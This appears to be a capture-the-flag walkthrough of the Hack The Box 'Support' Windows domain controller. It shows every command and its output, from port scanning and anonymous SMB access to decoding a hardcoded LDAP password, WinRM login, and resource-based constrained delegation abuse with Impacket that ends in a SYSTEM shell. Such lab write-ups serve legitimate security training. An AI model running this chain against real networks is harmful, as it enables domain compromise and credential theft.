Support
#windows #easy #ldap
Last updated
#windows #easy #ldap
Last updated
sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.10.11.174 -oA openPortsPORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49674/tcp open unknown syn-ack ttl 127
49678/tcp open unknown syn-ack ttl 127
49702/tcp open unknown syn-ack ttl 127
49740/tcp open unknown syn-ack ttl 127cat openPorts.nmap | grep -oP '^[0-9]{1,5}' | tr '\n' ',' | sed 's/,$//'nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49678,49702,49740 -sCV -Pn 10.10.11.174 -oA targetedPORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-19 14:20:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-19T14:20:59
|_ start_date: N/Asmbclient -N -L //10.10.11.174Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share smbclient -N //10.10.11.174/support-toolssmb: \> ls
. D 0 Wed Jul 20 14:01:06 2022
.. D 0 Sat May 28 08:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 08:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 08:19:55 2022
putty.exe A 1273576 Sat May 28 08:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 08:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 14:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 08:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 08:19:43 2022smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (44.4 KiloBytes/sec) (average 44.4 KiloBytes/sec)mkdir UserInfo
unzip UserInfo.exe.zip -d UserInfofile UserInfo.exeUserInfo.exe: PE32 executable for MS Windows 6.00 (console), Intel i386 Mono/.Net assembly, 3 sectionsecho '10.10.11.174 support.htb' | sudo tee -a /etc/hostsimport base64
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"
data = bytearray(base64.b64decode(enc_password))
for i in range(len(data)):
data[i] = (data[i] ^ key[i % len(key)]) ^ 0xDF
password = data.decode('utf-8', errors='replace')
print("Decoded password:", password)python3 decode.pyDecoded password: nvE***********lmzldapsearch -H ldap://support.htb -D "ldap@support.htb" -w 'nvE***********lmz' -b "dc=support,dc=htb" "(sAMAccountName=support)"# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20250619114726.0Z
uSNCreated: 12617
info: Iron********************hful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 86091
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 133948093916831645
lastLogoff: 0
lastLogon: 133948094435113580
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133948072466987886evil-winrm -i 10.10.11.174 -u support -p 'Iron********************hful'*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> dir
Directory: C:\Users\support\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/19/2025 4:26 AM 34 user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
a677************************e149nxc ldap 10.10.11.174 -d support.htb --dns-server 10.10.11.174 -u 'support' -p 'Iron********************hful' --bloodhound -c AllLDAP 10.10.11.174 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP 10.10.11.174 389 DC [+] support.htb\support:Ironside47pleasure40Watchful
LDAP 10.10.11.174 389 DC Resolved collection methods: psremote, localadmin, container, trusts, acl, dcom, session, objectprops, group, rdp
LDAP 10.10.11.174 389 DC Done in 00M 38S
LDAP 10.10.11.174 389 DC Compressing output into /home/kali/.nxc/logs/DC_10.10.11.174_2025-06-19_140016_bloodhound.zipsudo sed -i '/support\.htb/ s/$/ dc.support.htb/' /etc/hosts*Evil-WinRM* PS C:\Users\support\Documents> upload PowerView.ps1
Info: Uploading /home/kali/htb/machines/support/exploits/PowerView.ps1 to C:\Users\support\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DCimpacket-addcomputer support.htb/support:Ironside47pleasure40Watchful -computer-name 'SANDIA$' -computer-pass 'Password123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account SANDIA$ with password Password123!.*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity SANDIA
DistinguishedName : CN=SANDIA,CN=Computers,DC=support,DC=htb
DNSHostName :
Enabled : True
Name : SANDIA
ObjectClass : computer
ObjectGUID : c738df45-c007-44cb-a8b2-b087b866f8cd
SamAccountName : SANDIA$
SID : S-1-5-21-1677581083-3380853377-188903654-5603
UserPrincipalName :
*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount SANDIA$
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount
DistinguishedName : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName : dc.support.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=SANDIA,CN=Computers,DC=support,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName :
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity
msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}impacket-getST -spn host/DC.support.htb -impersonate Administrator support.htb/sandia:Password123!
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@host_DC.support.htb@SUPPORT.HTB.ccache
export KRB5CCNAME=Administrator@host_DC.support.htb@SUPPORT.HTB.ccache
impacket-psexec -k -no-pass support.htb/Administrator@DC.support.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on DC.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file tzGLJWnY.exe
[*] Opening SVCManager on DC.support.htb.....
[*] Creating service HAxd on DC.support.htb.....
[*] Starting service HAxd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB
Directory of C:\Users\Administrator\Desktop
05/28/2022 04:17 AM <DIR> .
05/28/2022 04:11 AM <DIR> ..
06/20/2025 03:01 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,912,007,680 bytes free
C:\Users\Administrator\Desktop> type root.txt
df52************************53ab